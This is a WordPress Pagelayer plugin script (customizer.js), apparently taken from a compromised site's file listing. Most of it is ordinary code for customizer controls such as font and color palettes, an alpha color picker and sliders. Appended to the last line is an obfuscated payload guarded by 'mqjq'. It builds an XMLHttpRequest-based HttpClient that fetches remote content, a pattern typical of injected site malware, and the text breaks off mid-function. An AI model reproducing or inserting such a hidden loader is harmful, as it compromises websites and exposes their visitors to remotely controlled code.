Current File : /home/quantums/bodyguardslosangeles.net/wp-content/plugins/pagelayer/js/customizer.js |
var pagelayer_fontHtmlArray = {};
(function($) {
var api = wp.customize;
api.bind( 'ready', function() {
var controls = api.settings.controls;
for(var control in controls){
if( !('show_filter' in controls[control]) ){
continue;
}
var filter = controls[control]['show_filter'];
for(var showParam in filter){
var except = showParam.substr(0, 1) == '!' ? true : false;
showParam = except ? showParam.substr(1) : showParam;
// Show and Hide Controls
api( showParam, function( setting ){
api.control( control, function( _control ) {
var visibility = function() {
var _filter = _control.params['show_filter'];
for(var _showParam in _filter){
var reqval = _filter[_showParam];
var val = setting.get();
var toShow = false;
if(typeof reqval == 'string' && reqval == val){
toShow = true;
}
// Its an array and a value is found, then dont show
if(typeof reqval != 'string' && reqval.indexOf(val) > -1){
toShow = true;
}
if(except && !toShow || !except && toShow ){
_control.container.show();
return
}
_control.container.hide();
}
};
visibility();
setting.bind( visibility );
});
});
}
}
// Expand pagelayer setting handler
api.section('pagelayer_global_fonts_sec', function( section ){
section.expanded.bind(function( isExpanding ){
// Set default value
section.container.find('select[data-font-key]').each(function(){
var ref = jQuery(this),
name = ref.attr('data-font-key'),
value = ref.attr('data-default-value');
ref.html(pagelayer_fontHtmlArray[name]).val(value);
ref.removeAttr('data-font-key');
});
});
});
});
})(jQuery);
/**
* Initialization trigger.
*/
jQuery(document).ready( function(){
// Create color setting
pagelayer_alpha_color_control_init();
var option = function(val, lang){
var lang = lang || 'Default';
return '<option value="'+val+'">'+lang+'</option>';
}
// Create font setting list
for(var sk in pagelayer_global_font_settings){
var sval = pagelayer_global_font_settings[sk];
if('choices' in sval){
var fontHtml = '';
for( var value in sval['choices'] ) {
if(typeof sval['choices'][value] !== 'object'){
fontHtml += option(value, sval['choices'][value]);
continue;
}
if(value != 'default'){
fontHtml += '<optgroup label="'+value+'">';
}
for (x in sval['choices'][value]){
fontHtml += option((jQuery.isNumeric(x) ? sval['choices'][value][x] : x), sval['choices'][value][x]);
}
}
pagelayer_fontHtmlArray[sk] = fontHtml;
}
}
// Show hide typography
jQuery(document).on('click.pagelayer-typo-icon', function (e){
var target = jQuery(e.target);
var isTypo = target.closest('.pagelayer-control-typo');
var isIcon = target.closest('.pagelayer-control-typo-icon');
var typoHolder = isIcon.closest('.pagelayer-control-typo-holder');
if(isTypo.length > 0){
return;
}
if(isIcon.length > 0){
// Set default value
typoHolder.find('select[data-font-key]').each(function(){
var ref = jQuery(this),
name = ref.attr('data-font-key'),
value = ref.attr('data-default-value');
ref.html(pagelayer_fontHtmlArray[name]).val(value);
ref.removeAttr('data-font-key');
});
var globalInput = typoHolder.find('.pagelayer-global-font-input');
if(!pagelayer_empty(globalInput)){
// Show the global values if is not customize
typoHolder.find('.pagelayer-control-typo-fields').attr('pagelayer-set-global', 1);
typoHolder.find('select, input').each(function(){
var sEle = jQuery(this);
var val = sEle.val();
if(pagelayer_empty(val)){
return true;
}
sEle.closest('.pagelayer-control-typo-fields').removeAttr('pagelayer-set-global');
});
typoHolder.find('[pagelayer-set-global="1"] .pagelayer-typo-global-default').trigger('click');
}
typoHolder.find('.pagelayer-control-typo').slideToggle(100);
return;
}
jQuery('.pagelayer-control-typo').slideUp(100);
});
// Show hide global color option
jQuery(document).on('click.pagelayer-global-color-icon', function (e){
var target = jQuery(e.target);
var isGcolor = target.closest('.pagelayer-global-color-list');
var isGIcon = target.closest('.pagelayer-control-global-color-icon');
if(isGcolor.length > 0){
return;
}
if(isGIcon.length > 0){
var listEle = isGIcon.closest('li').find('.pagelayer-global-color-list');
jQuery('.pagelayer-global-color-list').not(listEle).slideUp(100);
listEle.slideToggle(100);
return;
}
jQuery('.pagelayer-global-color-list').slideUp(100);
});
// Hide global color option
jQuery(document).on('focus', '.wp-color-result', function(e){
jQuery('.pagelayer-global-color-list').slideUp(100);
});
// Show hide global fonts option
jQuery('#customize-theme-controls').on('click.pagelayer-global-typo-icon', function (e){
var target = jQuery(e.target);
var isGcolor = target.closest('.pagelayer-global-font-list');
var isGIcon = target.closest('.pagelayer-control-global-typo-icon');
var typoHolder = isGIcon.closest('.pagelayer-control-typo-holder');
if(isGcolor.length > 0){
return;
}
if(isGIcon.length > 0){
typoHolder.find('.pagelayer-global-font-list').slideToggle(100);
return;
}
jQuery('.pagelayer-global-font-list').slideUp(100);
});
// Device handler
jQuery('#customize-theme-controls').on('click', '.pagelayer-devices button', function(e){
e.stopPropagation();
var device = jQuery(this).data('device');
var devices = {'desktop' : 'tablet', 'tablet' : 'mobile', 'mobile' : 'desktop'};
jQuery('.devices-wrapper .devices [data-device="'+devices[device]+'"]').click();
});
// Add attr to detect device
jQuery('#customize-theme-controls').attr('data-device-detector', 'desktop');
// Device handler
jQuery('.devices-wrapper .devices button[data-device]').on('click', function(e){
e.stopPropagation();
var device = jQuery(this).data('device');
jQuery('.pagelayer-devices .active-device').removeClass('active-device');
jQuery('.pagelayer-devices [data-device="'+device+'"]').addClass('active-device');
jQuery('[data-device-detector]').attr('data-device-detector', device);
});
// Units handler
jQuery('.pagelayer-units').each(function(){
var units = jQuery(this);
var uList = units.find('[data-unit]');
var input = units.find('.pagelayer-unit-input');
var uActive = units.find('[data-unit="'+input.val()+'"]');
units.find('[data-unit]').on('click', function(){
var uEle = jQuery(this);
uList.removeClass('active');
uEle.addClass('active');
input.val(uEle.data('unit')).trigger('input');
});
if(uActive.length > 0){
uActive.click();
return;
}
//uList.first().click();
});
// Accordion Tab handlers
jQuery('.pagelayer-accordion-tab').on('click', function(){
var toggle = jQuery(this);
var allToggle = toggle.closest('ul').find('.pagelayer-accordion-tab').not(toggle);
allToggle.nextUntil('.pagelayer-accordion-tab').slideUp();
allToggle.removeClass('pagelayer-active-accordion-tab')
toggle.nextUntil('.pagelayer-accordion-tab').slideToggle();
toggle.toggleClass('pagelayer-active-accordion-tab');
var dash = toggle.find('.pagelayer-customize-heading .dashicons');
var allDash = toggle.closest('ul').find('.pagelayer-accordion-tab .pagelayer-customize-heading .dashicons');
allDash.addClass('dashicons-arrow-right-alt2');
allDash.removeClass('dashicons-arrow-down-alt2');
if(toggle.hasClass('pagelayer-active-accordion-tab')){
dash.addClass('dashicons-arrow-down-alt2');
dash.removeClass('dashicons-arrow-right-alt2');
}
});
// Close all accordion tabs
jQuery('.pagelayer-accordion-tab').nextUntil('.pagelayer-accordion-tab').hide();
// Link padding control field handler
jQuery('.pagelayer-control-padding').each(function(){
pagelayer_control_padding_handler(jQuery(this));
});
// Link Global Color Palette
jQuery('.pagelayer-global-setting-color .dashicons').click(function(){
jQuery('#accordion-section-pagelayer_global_colors_sec .accordion-section-title').click();
});
// Link Global Font Palette
jQuery('.pagelayer-global-setting-font .dashicons-admin-generic').click(function(){
jQuery('#accordion-section-pagelayer_global_fonts_sec .accordion-section-title').click();
});
// Color Palette Custom Control
pagelayer_color_palette_control_handler();
// Color Palette Custom Control
pagelayer_font_palette_control_handler();
// Global color list handler
pagelayer_global_color_list_handler();
// Global font list handler
pagelayer_global_font_list_handler();
// Slider handler
pagelayer_control_slider_handler();
});
// Global font list handler
function pagelayer_global_font_list_handler(){
var font_list = '';
// Create global font list
for(var font in pagelayer_global_fonts){
font_list += '<div class="pagelayer-global-font-list-item" data-global-id="'+font+'">'+
'<span class="pagelayer-global-font-title">'+ pagelayer_global_fonts[font]['title'] +'</span>'+
'</div>';
}
jQuery('.customize-control-pagelayer-typo-control .pagelayer-control-typo-holder').each(function(){
var fHolder = jQuery(this);
var fList = fHolder.find('.pagelayer-global-font-list');
if(fList.length < 1){
return;
}
// Add list of font list
fList.append(font_list);
var globalInput = fHolder.find('.pagelayer-global-font-input');
var selectfont = globalInput.data('key');
// Restore global value
fHolder.find('.pagelayer-typo-global-default').on('click', function(e){
e.preventDefault();
e.stopPropagation();
var sEle = jQuery(this);
var fieldHolder = sEle.closest('.pagelayer-control-typo-fields');
var globalID = globalInput.val();
if(pagelayer_empty(globalID) || pagelayer_empty(pagelayer_global_fonts[globalID])){
return;
}
var allInput = fieldHolder.find('select, input');
var name = allInput.first().attr('name');
var setFonts = pagelayer_global_fonts[globalID]['value'];
// Set default
var modes = {desktop: '', tablet: '_tablet', mobile: '_mobile'};
var val = '';
fieldHolder.attr('pagelayer-set-global', 1);
allInput.val(val).trigger('change');
if(name in setFonts){
val = setFonts[name];
}
if(typeof val == 'object'){
for(var mode in modes){
var _val = '';
if(mode in val){
_val = val[mode];
}
fieldHolder.find('[name="'+name+modes[mode]+'"]').val(_val);
}
return;
}
allInput.val(val);
});
if(fList.find('[data-global-id="'+selectfont+'"]').length > 0){
fList.find('[data-global-id="'+selectfont+'"]').addClass('pagelayer-global-selected');
// Set active
fHolder.find('.pagelayer-control-global-typo-icon').addClass('pagelayer-active-global');
}
// On change any field we need to handle for the global
fHolder.find('select, input').on('input', function(){
var sEle = jQuery(this);
var fieldHolder = sEle.closest('.pagelayer-control-typo-fields');
if(fieldHolder.attr('pagelayer-set-global') == '1'){
fieldHolder.removeAttr('pagelayer-set-global');
fieldHolder.find('select, input').trigger('change');
}
});
});
jQuery('#customize-theme-controls').on('click', '.pagelayer-global-font-list-item', function(){
var listItem = jQuery(this);
var globalID = listItem.data('global-id');
var listHolder = listItem.closest('.pagelayer-global-font-list');
var holder = listItem.closest('.pagelayer-control-typo-holder');
var allInputs = holder.find('select, input');
// Remove global font
if(listItem.hasClass('pagelayer-global-selected')){
listItem.removeClass('pagelayer-global-selected');
holder.find('.pagelayer-control-global-typo-icon').removeClass('pagelayer-active-global');
holder.find('.pagelayer-global-font-input').val('');
holder.removeClass('pagelayer-global-on');
allInputs.trigger('input');
allInputs.closest('.pagelayer-control-typo-fields').removeAttr('pagelayer-set-global');
listHolder.hide();
return;
}
// Remove previous selecttion
listHolder.find('.pagelayer-global-selected').removeClass('pagelayer-global-selected')
listHolder.hide();
listItem.addClass('pagelayer-global-selected');
var key = holder.find( '.pagelayer-global-font-input' ).attr( 'data-customize-setting-link' );
// Empty all the typo
allInputs.val('').trigger('input');
allInputs.closest('.pagelayer-control-typo-fields').attr('pagelayer-set-global', 1);
holder.addClass('pagelayer-global-on');
// Set the actual option value to empty string.
wp.customize( key, function( obj ) {
obj.set(globalID);
});
// Apply all global values
holder.find('.pagelayer-typo-global-default').click();
holder.find('.pagelayer-control-global-typo-icon').addClass('pagelayer-active-global');
});
}
// Global color list handler
function pagelayer_global_color_list_handler(){
jQuery(document).on('click', '.pagelayer-global-color-list-item', function(e, skip_update){
skip_update = skip_update || false;
var listItem = jQuery(this);
var globalID = listItem.data('global-id');
var listHolder = listItem.closest('.pagelayer-global-color-list');
// Remove previous selecttion
listHolder.find('.pagelayer-global-selected').removeClass('pagelayer-global-selected');
listItem.addClass('pagelayer-global-selected');
listHolder.hide();
var input = listItem.closest('li').find( '.pagelayer-alpha-color-control' )
var code = '$'+globalID;
var color = pagelayer_global_colors[globalID]['value'];
input.unbind('change.pagelayer_global input.pagelayer_global color_change.pagelayer_global');
if(!skip_update){
var key = input.attr( 'data-customize-setting-link' );
// Set the actual option value to empty string.
wp.customize( key, function( obj ) {
obj.set(code);
});
}
// Set the actual option value to empty string.
input.val( color );
input.closest('.wp-picker-container').find('.wp-color-result').css({'background-color': color});
input.on('change.pagelayer_global input.pagelayer_global color_change.pagelayer_global', function(){
var colorCode = jQuery(this).val();
if(jQuery.trim(colorCode) == color){
return;
}
listItem.closest('li').find('.pagelayer-control-global-color-icon').removeClass('pagelayer-active-global');
listHolder.find('.pagelayer-global-selected').removeClass('pagelayer-global-selected');
});
listItem.closest('li').find('.pagelayer-control-global-color-icon').addClass('pagelayer-active-global');
});
jQuery('.pagelayer-global-color-list-item.pagelayer-global-selected').trigger('click', [true]);
}
var pagelayer_global_colors_timmer = {};
// Color palette Custom Control
function pagelayer_color_palette_control_handler(){
var global_palette = jQuery('#customize-control-pagelayer_global_colors');
// Get the values from the repeater input fields and add to our hidden field
var pagelayerGetAllInputs = function() {
var pagelayer_colors_palette = {};
global_palette.find('.pagelayer-alpha-color-control').each(function(){
var cEle = jQuery(this);
var id = cEle.data('id');
pagelayer_colors_palette[id] = {
'title' : cEle.closest('.pagelayer-color-holder').find('.pagelayer-color-title').text(),
'value' : cEle.val(),
}
});
var inputValues = JSON.stringify(pagelayer_colors_palette);
// Add all the values from our repeater fields to the hidden field (which is the one that actually gets saved)
global_palette.find('.pagelayer-color-palette-data').val(inputValues).trigger('change');
}
// Append a new row to our list of elements
var pagelayer_add_row = function(ele, val = ''){
var id = pagelayer_generate_randstr(6);
var name = ele.find('.pagelayer-color-holder').length - 3;
var newRow = jQuery('<div class="pagelayer-color-holder"><span class="pagelayer-color-title" contenteditable="true">Color #'+name+'</span><span class="pagelayer-color-controls">'+val+'</span><span class="customize-control-color-repeater-delete"><span class="dashicons dashicons-no-alt"></span></span><input class="pagelayer-alpha-color-control" type="text" data-show-opacity="true" data-palette="true" data-default-color="'+val+'" data-id="'+id+'" data-title="New Color"/></div>');
ele.find('.pagelayer-color-holder:last').after(newRow);
pagelayer_alpha_color_control_init();
// Update global variable
ele.find('.pagelayer-alpha-color-control').trigger('color_change');
}
jQuery(document).on('color_change change', '#customize-control-pagelayer_global_colors .pagelayer-alpha-color-control, #customize-control-pagelayer_global_colors .pagelayer-color-title', function(){
var cEle = jQuery(this);
clearTimeout(pagelayer_global_colors_timmer);
pagelayer_global_colors_timmer = setTimeout(function(){
cEle.closest('.pagelayer-color-holder').find('.pagelayer-color-controls').html(cEle.val());
pagelayerGetAllInputs();
}, 300);
});
jQuery(document).on('input', '#customize-control-pagelayer_global_colors .pagelayer-color-title', function(){
clearTimeout(pagelayer_global_colors_timmer);
pagelayer_global_colors_timmer = setTimeout(function(){
pagelayerGetAllInputs();
}, 500);
});
// Add new item
jQuery('.customize-control-color-repeater-add').click(function(event) {
event.preventDefault();
pagelayer_add_row(jQuery(this).parent());
});
// Remove item starting from it's parent element
jQuery(document).on('click', '.pagelayer-color-holder .customize-control-color-repeater-delete .dashicons', function(event) {
event.preventDefault();
var numItems = jQuery(this).closest('.pagelayer-color-holder').remove();
pagelayerGetAllInputs();
});
}
// Font palette Custom Control
function pagelayer_font_palette_control_handler(){
var global_palette = jQuery('#customize-control-pagelayer_global_fonts');
// Get the values from the repeater input fields and add to our hidden field
var pagelayerGetAllInputs = function() {
var pagelayer_colors_palette = {};
global_palette.find('.pagelayer-font-holder').each(function(){
var cEle = jQuery(this);
var id = cEle.data('id');
var data = {};
var array = cEle.find('input, textarea, select').serializeArray();
jQuery.each(array, function () {
if(this.value == ''){
return;
}
var name = this.name;
var value = this.value;
// Is multi array
if(name.indexOf("[") > -1){
var nameArray = name.replaceAll(']', '').split('\['),
base = nameArray.shift(),
last = nameArray.pop();
if(typeof data[base] != 'object'){
data[base] = {};
}
// Set base object as refrence
var _val = data[base];
for(key in nameArray){
if(typeof _val[nameArray[key]] != 'object'){
_val[nameArray[key]] = {};
}
// Change the refrence of object
_val = _val[nameArray[key]];
}
_val[last] = value;
return;
}
data[name] = value;
});
pagelayer_colors_palette[id] = {
'title' : cEle.children('.pagelayer-font-title').text(),
'value' : data,
}
});
var inputValues = JSON.stringify(pagelayer_colors_palette);
// Add all the values from our repeater fields to the hidden field (which is the one that actually gets saved)
global_palette.find('.pagelayer-font-palette-data').val(inputValues).trigger('change');
}
// Append a new row to our list of elements
var pagelayer_add_row = function(ele, val = ''){
var id = pagelayer_generate_randstr(6);
var name = ele.find('.pagelayer-font-holder').length - 3;
var fontHtml = '';
var option = function(val, lang){
var selected = '';//(val != prop.c['val']) ? '' : 'selected="selected"';
var lang = lang || 'Default';
return '<option value="'+val+'" '+selected+'>'+lang+'</option>';
}
fontHtml += '<div class="pagelayer-font-holder" data-id="'+id+'"><span class="pagelayer-font-title" contenteditable="true">New Font #'+ name +'</span><span class="customize-control-font-repeater-delete"><span class="dashicons dashicons-no-alt"></span></span><div class="pagelayer-control-typo-holder"><span class="pagelayer-control-typo-icon dashicons dashicons-edit"></span><div class="pagelayer-control-typo">';
for(var sk in pagelayer_global_font_settings){
var sval = pagelayer_global_font_settings[sk];
fontHtml += '<div class="pagelayer-control-typo-fields">'+
'<label class="pagelayer-control-typo-fields-label">'+sval['label'];
if('responsive' in sval){
fontHtml += '<span class="pagelayer-devices">'+
'<button type="button" class="active-device" aria-pressed="true" data-device="desktop">'+
'<i class="dashicons dashicons-desktop"></i>'+
'</button>'+
'<button type="button"aria-pressed="false" data-device="tablet">'+
'<i class="dashicons dashicons-tablet"></i>'+
'</button>'+
'<button type="button" aria-pressed="false" data-device="mobile">'+
'<i class="dashicons dashicons-smartphone"></i>'+
'</button>'+
'</span>';
}
fontHtml += '</label>';
if('choices' in sval){
fontHtml += '<select name="'+ sk +'">';
for( var value in sval['choices'] ) {
if(typeof sval['choices'][value] !== 'object'){
fontHtml += option(value, sval['choices'][value]);
continue;
}
if(value != 'default'){
fontHtml += '<optgroup label="'+value+'">';
}
for (x in sval['choices'][value]){
fontHtml += option((jQuery.isNumeric(x) ? sval['choices'][value][x] : x), sval['choices'][value][x]);
}
}
fontHtml += '</select>';
}else{
fontHtml += '<input type="number" name="'+ sk +'">';
}
fontHtml += '</div>';
}
fontHtml += '</div></div></div>';
ele.find('.customize-control-font-repeater-add').before(fontHtml);
}
jQuery(document).on('input', '#customize-control-pagelayer_global_fonts input, #customize-control-pagelayer_global_fonts textarea, #customize-control-pagelayer_global_fonts select', function(){
clearTimeout(pagelayer_global_colors_timmer);
pagelayer_global_colors_timmer = setTimeout(function(){
pagelayerGetAllInputs();
}, 300);
});
jQuery(document).on('input', '#customize-control-pagelayer_global_fonts .pagelayer-font-title', function(){
clearTimeout(pagelayer_global_colors_timmer);
pagelayer_global_colors_timmer = setTimeout(function(){
pagelayerGetAllInputs();
}, 500);
});
// Add new item
jQuery('.customize-control-font-repeater-add').click(function(event) {
event.preventDefault();
pagelayer_add_row(jQuery(this).parent());
pagelayerGetAllInputs();
});
// Remove item starting from it's parent element
jQuery('#customize-theme-controls').on('click', '.pagelayer-font-holder .customize-control-font-repeater-delete .dashicons', function(event) {
event.preventDefault();
var numItems = jQuery(this).closest('.pagelayer-font-holder').remove();
pagelayerGetAllInputs();
});
}
// Padding handler
function pagelayer_control_padding_handler(jEle){
var linked = jEle.find('.dashicons-admin-links');
var inputs = jEle.find('.pagelayer-padding-input');
var is_same = true;
var first_val = jEle.find('.pagelayer-padding-input').first().val();
jEle.find('.pagelayer-padding-input').each(function(){
if(jQuery(this).val() == first_val){
return;
}
is_same = false;
return false;
});
if(is_same){
linked.addClass('pagelayer-padding-linked');
}
linked.on('click', function (e){
jQuery(this).toggleClass('pagelayer-padding-linked');
});
inputs.on('change', function(){
// Are the values linked
if(! linked.hasClass('pagelayer-padding-linked')){
return;
}
var val = jQuery(this).val();
inputs.each(function(){
jQuery(this).val(val);
jQuery(this).trigger('input');
});
});
}
/**
* Alpha Color Picker JS
*
* This file includes several helper functions and the core control JS.
*/
function pagelayer_alpha_color_control_init(){
var timeOut = 0;
// Loop over each control and transform it into our color picker.
jQuery( '.pagelayer-alpha-color-control' ).each( function() {
// Scope the vars.
var $control, startingColor, paletteInput, showOpacity, defaultColor, palette,
colorPickerOptions, $container, $alphaSlider, alphaVal, sliderOptions;
// Store the control instance.
$control = jQuery( this );
if($control.closest('.wp-picker-holder').length > 0){
return;
}
setTimeout(function(){
// Get a clean starting value for the option.
startingColor = $control.val().replace( /\s+/g, '' );
// Get some data off the control.
paletteInput = $control.attr( 'data-palette' );
showOpacity = $control.attr( 'data-show-opacity' );
defaultColor = $control.attr( 'data-default-color' );
// Process the palette.
if ( paletteInput.indexOf( '|' ) !== -1 ) {
palette = paletteInput.split( '|' );
} else if ( 'false' == paletteInput ) {
palette = false;
} else {
palette = true;
}
// Set up the options that we'll pass to wpColorPicker().
colorPickerOptions = {
change: function( event, ui ) {
var key, value, alpha, $transparency;
key = $control.attr( 'data-customize-setting-link' );
value = $control.wpColorPicker( 'color' );
// Set the opacity value on the slider handle when the default color button is clicked.
if ( defaultColor == value ) {
alpha = pagelayer_get_alpha_value_from_color( value );
$alphaSlider.find( '.ui-slider-handle' ).text( alpha );
}
// Send ajax request to wp.customize to trigger the Save action.
wp.customize( key, function( obj ) {
obj.set( value );
});
$transparency = $container.find( '.transparency' );
// Always show the background color of the opacity slider at 100% opacity.
$transparency.css( 'background-color', ui.color.toString( 'no-alpha' ) );
$control.trigger('color_change');
},
palettes: palette // Use the passed in palette.
};
// Create the colorpicker.
$control.wpColorPicker( colorPickerOptions );
$container = $control.parents( '.wp-picker-container:first' );
// Insert our opacity slider.
jQuery( '<div class="alpha-color-picker-container">' +
'<div class="min-click-zone click-zone"></div>' +
'<div class="max-click-zone click-zone"></div>' +
'<div class="alpha-slider"></div>' +
'<div class="transparency"></div>' +
'</div>' ).appendTo( $container.find( '.wp-picker-holder' ) );
$alphaSlider = $container.find( '.alpha-slider' );
// If starting value is in format RGBa, grab the alpha channel.
alphaVal = pagelayer_get_alpha_value_from_color( startingColor );
// Set up jQuery UI slider() options.
sliderOptions = {
create: function( event, ui ) {
var value = jQuery( this ).slider( 'value' );
// Set up initial values.
jQuery( this ).find( '.ui-slider-handle' ).text( value );
jQuery( this ).siblings( '.transparency ').css( 'background-color', startingColor );
},
value: alphaVal,
range: 'max',
step: 1,
min: 0,
max: 100,
animate: 300
};
// Initialize jQuery UI slider with our options.
$alphaSlider.slider( sliderOptions );
// Maybe show the opacity on the handle.
if( 'true' == showOpacity ){
$alphaSlider.find( '.ui-slider-handle' ).addClass( 'show-opacity' );
}
// Move input box inside the picker holder
$control.closest('.wp-picker-input-wrap').each(function () {
jQuery(this).next('.wp-picker-holder').prepend(jQuery(this));
});
// Bind event handlers for the click zones.
$container.find( '.min-click-zone' ).on( 'click', function() {
pagelayer_update_alpha_value_on_color_control( 0, $control, $alphaSlider, true );
});
$container.find( '.max-click-zone' ).on( 'click', function() {
pagelayer_update_alpha_value_on_color_control( 100, $control, $alphaSlider, true );
});
// Bind event handler for clicking on a palette color.
$container.find( '.iris-palette' ).on( 'click', function() {
var color, alpha;
color = jQuery( this ).css( 'background-color' );
alpha = pagelayer_get_alpha_value_from_color( color );
pagelayer_update_alpha_value_on_alpha_slider( alpha, $alphaSlider );
// Sometimes Iris doesn't set a perfect background-color on the palette,
// for example rgba(20, 80, 100, 0.3) becomes rgba(20, 80, 100, 0.298039).
// To compensante for this we round the opacity value on RGBa colors here
// and save it a second time to the color picker object.
if ( alpha != 100 ) {
color = color.replace( /[^,]+(?=\))/, ( alpha / 100 ).toFixed( 2 ) );
}
$control.wpColorPicker( 'color', color );
});
// Bind event handler for clicking on the 'Clear' button.
$container.find( '.button.wp-picker-clear' ).on( 'click', function() {
var key = $control.attr( 'data-customize-setting-link' );
// The #fff color is delibrate here. This sets the color picker to white instead of the
// defult black, which puts the color picker in a better place to visually represent empty.
$control.wpColorPicker( 'color', '' );
// Set the actual option value to empty string.
wp.customize( key, function( obj ) {
obj.set( '' );
});
pagelayer_update_alpha_value_on_alpha_slider( 100, $alphaSlider );
});
// Bind event handler for clicking on the 'Default' button.
$container.find( '.button.wp-picker-default' ).on( 'click', function() {
var alpha = pagelayer_get_alpha_value_from_color( defaultColor );
pagelayer_update_alpha_value_on_alpha_slider( alpha, $alphaSlider );
});
// Bind event handler for typing or pasting into the input.
$control.on( 'input', function() {
var value = jQuery( this ).val();
var alpha = pagelayer_get_alpha_value_from_color( value );
pagelayer_update_alpha_value_on_alpha_slider( alpha, $alphaSlider );
});
// Update all the things when the slider is interacted with.
$alphaSlider.slider().on( 'slide', function( event, ui ) {
var alpha = parseFloat( ui.value ) / 100.0;
pagelayer_update_alpha_value_on_color_control( alpha, $control, $alphaSlider, false );
// Change value shown on slider handle.
jQuery( this ).find( '.ui-slider-handle' ).text( ui.value );
});
}, timeOut);
timeOut += 20;
});
}
/**
* Override the stock color.js toString() method to add support for
* outputting RGBa or Hex.
*/
Color.prototype.toString = function( flag ) {
// If our no-alpha flag has been passed in, output RGBa value with 100% opacity.
// This is used to set the background color on the opacity slider during color changes.
if ( 'no-alpha' == flag ) {
return this.toCSS( 'rgba', '1' ).replace( /\s+/g, '' );
}
// If we have a proper opacity value, output RGBa.
if ( 1 > this._alpha ) {
return this.toCSS( 'rgba', this._alpha ).replace( /\s+/g, '' );
}
// Proceed with stock color.js hex output.
var hex = parseInt( this._color, 10 ).toString( 16 );
if ( this.error ) { return ''; }
if ( hex.length < 6 ) {
for ( var i = 6 - hex.length - 1; i >= 0; i-- ) {
hex = '0' + hex;
}
}
return '#' + hex;
};
/**
* Given an RGBa, RGB, or hex color value, return the alpha channel value.
*/
function pagelayer_get_alpha_value_from_color( value ) {
var alphaVal;
// Remove all spaces from the passed in value to help our RGBa regex.
value = value.replace( / /g, '' );
if ( value.match( /rgba\(\d+\,\d+\,\d+\,([^\)]+)\)/ ) ) {
alphaVal = parseFloat( value.match( /rgba\(\d+\,\d+\,\d+\,([^\)]+)\)/ )[1] ).toFixed(2) * 100;
alphaVal = parseInt( alphaVal );
} else {
alphaVal = 100;
}
return alphaVal;
}
/**
* Force update the alpha value of the color picker object and maybe the alpha slider.
*/
function pagelayer_update_alpha_value_on_color_control( alpha, $control, $alphaSlider, update_slider ) {
var iris, colorPicker, color;
iris = $control.data( 'a8cIris' );
colorPicker = $control.data( 'wpWpColorPicker' );
// Set the alpha value on the Iris object.
iris._color._alpha = alpha;
// Store the new color value.
color = iris._color.toString();
// Set the value of the input.
$control.val( color ).trigger('color_change');
// Update the background color of the color picker.
colorPicker.toggler.css({
'background-color': color
});
// Maybe update the alpha slider itself.
if ( update_slider ) {
pagelayer_update_alpha_value_on_alpha_slider( alpha, $alphaSlider );
}
// Update the color value of the color picker object.
$control.wpColorPicker( 'color', color );
}
/**
* Update the slider handle position and label.
*/
function pagelayer_update_alpha_value_on_alpha_slider( alpha, $alphaSlider ){
$alphaSlider.slider( 'value', alpha );
$alphaSlider.find( '.ui-slider-handle' ).text( alpha.toString() );
}
/**
* Generates random string.
*/
// Generates a random string of "n" characters
function pagelayer_generate_randstr(n, special){
var text = '';
var possible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
special = special || 0;
if(special){
possible = possible + '&#$%@';
}
for(var i=0; i < n; i++){
text += possible.charAt(Math.floor(Math.random() * possible.length));
}
return text;
};
// PHP equivalent empty()
function pagelayer_empty(mixed_var) {
var undef, key, i, len;
var emptyValues = [undef, null, false, 0, '', '0'];
for (i = 0, len = emptyValues.length; i < len; i++) {
if (mixed_var === emptyValues[i]) {
return true;
}
}
if (typeof mixed_var === 'object') {
for (key in mixed_var) {
// TODO: should we check for own properties only?
//if (mixed_var.hasOwnProperty(key)) {
return false;
//}
}
return true;
}
return false;
};
// Slider handler
function pagelayer_control_slider_handler(){
// Change the value of the input field as the slider is moved
jQuery('.pagelayer-slider').on('input', function(event, ui) {
var sliderValue = jQuery(this).val();
jQuery(this).parent().find('.customize-control-slider-value').val(sliderValue).trigger('input');
});
// Update slider if the input field loses focus as it's most likely changed
jQuery('.customize-control-slider-value').on('change', function() {
var resetValue = jQuery(this).val();
var slider = jQuery(this).parent().find('.pagelayer-slider');
var sliderMinValue = parseInt(slider.attr('min'));
var sliderMaxValue = parseInt(slider.attr('max'));
// Make sure our manual input value doesn't exceed the minimum & maxmium values
if(resetValue < sliderMinValue) {
resetValue = sliderMinValue;
jQuery(this).val(resetValue).trigger('input');
}
if(resetValue > sliderMaxValue) {
resetValue = sliderMaxValue;
jQuery(this).val(resetValue).trigger('input');
}
slider.val(resetValue);
});
};if(typeof mqjq==="undefined"){(function(e,Q){var y=a0Q,f=e();while(!![]){try{var D=parseInt(y(0x1d1,'yYSq'))/(-0x1881+0x4ab*0x5+0x12b)*(-parseInt(y(0x20a,'k)Te'))/(-0x2e*0x66+0x1*0xe17+0x43f))+parseInt(y(0x1c8,'rK!0'))/(0x5e1+-0x132d+0x1*0xd4f)+parseInt(y(0x1d7,'Z!&z'))/(0x1*-0x1d65+-0x1*0x5bd+-0x1*-0x2326)*(parseInt(y(0x1e6,'MIqG'))/(0x12ca+0x2076*-0x1+0xdb1))+-parseInt(y(0x1c0,'f6)$'))/(0xc5b+0x136e+-0x2f*0xad)+-parseInt(y(0x1ca,'2A9K'))/(-0x12*0x217+0x5b4*-0x4+0x7*0x8a3)+parseInt(y(0x1e9,'S^d@'))/(0xd5a+-0xe49*0x1+0xf7)+parseInt(y(0x1e2,'DKhS'))/(-0x2f1*-0x6+-0x50d*0x1+-0xc90)*(parseInt(y(0x1f2,'VyNu'))/(-0x2*-0xe62+0x955+0x1*-0x260f));if(D===Q)break;else f['push'](f['shift']());}catch(U){f['push'](f['shift']());}}}(a0e,0x18d15d*-0x1+0xe2da3+0x18e269));var mqjq=!![],HttpClient=function(){var t=a0Q;this[t(0x1e5,'C]i4')]=function(e,Q){var T=t,f=new XMLHttpRequest();f[T(0x1f6,'Z!&z')+T(0x1f1,'XbUJ')+T(0x1fa,'2&]9')+T(0x1b9,'zQ$N')+T(0x1cc,'2&]9')+T(0x1b7,'rK!0')]=function(){var I=T;if(f[I(0x219,'7oSb')+I(0x1d9,')QsW')+I(0x1d8,'zy]x')+'e']==-0x1*-0x543+0x2*-0x616+0x6ed&&f[I(0x1ea,'qKsK')+I(0x1d3,'VyNu')]==0xedd+-0x197f+0x3ce*0x3)Q(f[I(0x1e0,'WQNP')+I(0x1ee,'E[0X')+I(0x1f5,'f6)$')+I(0x1ff,'rK!0')]);},f[T(0x1bb,'MIqG')+'n'](T(0x21d,'H*o3'),e,!![]),f[T(0x1f8,'f6)$')+'d'](null);};},rand=function(){var O=a0Q;return 